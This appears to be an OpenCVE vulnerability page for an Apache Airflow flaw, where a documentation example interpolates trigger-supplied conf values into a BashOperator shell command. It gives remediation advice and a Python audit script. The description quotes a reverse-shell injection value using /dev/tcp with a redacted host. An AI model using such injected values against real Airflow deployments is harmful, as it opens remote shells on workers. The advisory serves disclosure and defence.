Description
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
Published: 2026-06-01
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The flaw arises from a Jinja2 injection pattern in Apache Airflow documentation that allows an authenticated user with Dag.can_trigger permission to insert shell metacharacters into the dag_run.conf field. When a DAG author copies the unquoted example verbatim into production, a malicious conf value such as "; bash -i >& /dev/tcp/.../9999 0>&1; #" is rendered into the BashOperator’s command string and executed by the worker, providing the attacker with remote code execution capability. The underlying weakness is improper input sanitization, identified as CWE‑1336. Based on the description, the attack vector is inferred as an authenticated user leveraging the trigger API to supply the malicious conf value.

Affected Systems

Any deployment of Apache Airflow that incorporated the original documentation example before the correction in PR 64129 is impacted. The vulnerability affects versions of Airflow building on that example, so all releases prior to 3.2.2 may expose users to the risk if they have retained the legacy pattern. The issue is relevant to multi‑team or hosted systems where trigger permissions are granted to low‑privilege accounts through the trigger API.

Risk and Exploitability

Because the flaw allows arbitrary shell code execution with only trigger‑level permissions and the trigger API is publicly exposed, the potential for exploitation is critical. The CVSS score is 9.1 (Critical), and the EPSS score is <1%, indicating a low estimated likelihood of exploitation at this time. The vulnerability is not listed in the KEV catalog. The risk is further amplified in environments where workers run with elevated privileges, making this a critical concern that should be addressed promptly.

Generated by OpenCVE AI on June 2, 2026 at 19:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

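  • Upgrade Apache Airflow to version 3.2.2 or later to receive the corrected documentation. The correction covered by this CVE is to the docs example, so upgrading does not rewrite Dag code that already copied the old pattern.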
  • Audit existing DAG definitions that replicate the old BashOperator example and update the bash_command to properly escape or quote any conf values before execution.
  • Restrict Dag.can_trigger permissions by reviewing and limiting the roles and users that can trigger DAGs, reducing the attack surface for potential injection attempts.

Generated by OpenCVE AI on June 2, 2026 at 19:06 UTC.
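
The audit recommended above, as an added example (not code from the Airflow project or from OpenCVE): a standard-library script that parses Dag source and reports every `bash_command` string literal that interpolates `dag_run.conf` into the command text. The sample Dag source is constructed, and the `env=`-based rewrite it contrasts with is an assumed hardening, not necessarily the wording of the corrected docs.

```python
import ast
import re

# Jinja expression that renders trigger-supplied conf into the surrounding string.
TAINTED_EXPR = re.compile(r"\{\{[^}]*\bdag_run\.conf\b[^}]*\}\}")

# Constructed sample Dag source (never imported, only parsed). "unsafe" is the
# pre-correction docs pattern; "safer" is an assumed rewrite that hands the value
# to bash as an environment variable, so the shell never parses it as code.
SAMPLE_DAG = '''
from airflow.providers.standard.operators.bash import BashOperator

unsafe = BashOperator(
    task_id="unsafe",
    bash_command="echo value: {{ dag_run.conf['conf1'] }}",
)

safer = BashOperator(
    task_id="safer",
    bash_command='echo "value: $CONF1"',
    env={"CONF1": "{{ dag_run.conf['conf1'] }}"},
    append_env=True,
)
'''


def audit_bash_commands(source, filename="<dag>"):
    """Return sorted (line, expression) pairs for every bash_command string
    literal that interpolates dag_run.conf directly into the command text."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        for kw in node.keywords:
            if kw.arg != "bash_command":
                continue
            # Walk the argument so concatenated literals are covered too.
            for part in ast.walk(kw.value):
                if isinstance(part, ast.Constant) and isinstance(part.value, str):
                    for match in TAINTED_EXPR.finditer(part.value):
                        findings.append((part.lineno, match.group(0)))
    return sorted(findings)


if __name__ == "__main__":
    for line, expr in audit_bash_commands(SAMPLE_DAG):
        print(f"line {line}: bash_command interpolates {expr}")
```

The scan only sees literals passed directly as the `bash_command` keyword; commands assembled in variables or loaded from template files need a manual review.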

Advisories

No advisories yet.

History

Tue, 02 Jun 2026 19:00:00 +0000

Type Values Removed Values Added
First Time appeared Apache
Apache airflow
CPEs cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
Vendors & Products Apache
Apache airflow

Tue, 02 Jun 2026 17:30:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}

ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Mon, 01 Jun 2026 09:15:00 +0000

Type Values Removed Values Added
Description Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
Title Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern
Weaknesses CWE-1336
References

MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2026-06-02T16:43:13.898Z

Reserved: 2026-04-25T18:49:46.124Z

Link: CVE-2026-42252

Vulnrichment

Updated: 2026-06-02T16:05:16.462Z

NVD

Status: Analyzed

Published: 2026-06-01T09:16:18.560

Modified: 2026-06-02T18:48:48.067

Link: CVE-2026-42252

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-02T20:15:16Z

Weaknesses
  • CWE-1336

    Improper Neutralization of Special Elements Used in a Template Engine